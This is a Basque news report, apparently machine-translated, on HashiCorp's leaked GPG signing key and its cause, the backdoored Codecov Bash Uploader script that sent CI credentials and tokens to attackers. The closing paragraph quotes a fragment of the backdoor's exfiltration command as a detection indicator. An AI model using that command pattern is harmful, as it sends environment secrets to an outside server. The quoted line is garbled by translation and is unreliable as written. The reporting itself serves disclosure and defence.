HashiCorp-ek, Vagrant, Packer, Nomad eta Terraform kode irekiko tresnak garatzeagatik ezaguna, oharrak egiaztatzen dituzten sinadura digitalak sortzeko erabiltzen den GPG gako pribatuaren filtrazioa iragarri zuen. GPG gakorako sarbidea lortu duten erasotzaileek HashiCorp produktuetan ezkutuko aldaketak egin ditzakete sinadura digital zuzenarekin egiaztatuz. Aldi berean, enpresak adierazi zuen auditoretzan zehar ez zela antzeman aldaketa horiek egiteko saiakeraren arrastorik.
Gaur egun, arriskuan dagoen GPG gakoa ezeztatu egin da eta gako berri bat sartu da haren ordez. Arazoak SHA256SUM eta SHA256SUM.sig fitxategiak erabiliz egiaztatzeari soilik eragin dio, eta ez du eraginik izan releases.hashicorp.com-en bidez emandako Linux DEB eta RPM paketeen sinadura digitalak sortzean, ezta macOS eta Windowsen bertsioak egiaztatzeko mekanismoetan ere (AuthentiCode). .
Filtrazioa azpiegituran Codecov Bash Uploader (codecov-bash) script-a erabiltzeagatik gertatu da, etengabeko integrazio sistemetatik estaldura-txostenak deskargatzeko diseinatua. Codecov konpainiaren aurkako erasoan, atzeko ate bat ezkutatu zen zehaztutako scriptean, eta horren bidez pasahitzak eta enkriptatze-gakoak bidali zituzten erasotzaileen zerbitzarira.
Hackeatzeko, erasotzaileek Codecov Docker irudia sortzeko prozesuan izandako errore bat aprobetxatu zuten, eta horri esker, GCS (Google Cloud Storage) atzitzeko datuak atera zituzten, beharrezkoak diren codecov.io-tik banatutako Bash Uploader scriptean aldaketak egiteko. webgunea. Aldaketak urtarrilaren 31n egin ziren, bi hilabetez detektatu gabe egon ziren eta erasotzaileei bezeroen etengabeko integrazio-sistemaren inguruneetan gordetako informazioa ateratzeko aukera eman zien. Gehitutako kode gaiztoa erabiliz, erasotzaileek probatutako Git biltegiari eta ingurune-aldagai guztiei buruzko informazioa lor dezakete, baita etengabeko integrazio sistemetara helarazitako tokenak, enkriptazio-gakoak eta pasahitzak, aplikazioen kodea, biltegiak eta Amazon Web Services eta GitHub bezalako zerbitzuetarako sarbidea antolatzeko.
Zuzeneko deiaz gain, Codecov Bash Uploader script-a beste kargatzaile batzuen parte gisa erabili zen, hala nola Codecov-action (Github), Codecov-circleci-orb eta Codecov-bitrise-step, zeinen erabiltzaileek ere arazoak dituztenak. Codecov-bash eta erlazionatutako produktuen erabiltzaile guztiei beren azpiegiturak ikuskatzea gomendatzen zaie, baita pasahitzak eta enkriptatze-gakoak aldatzea ere. Script batean atzeko ate baten presentzia egiazta dezakezu -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /kargatu/v2 || egia
Iturria: opennet.ru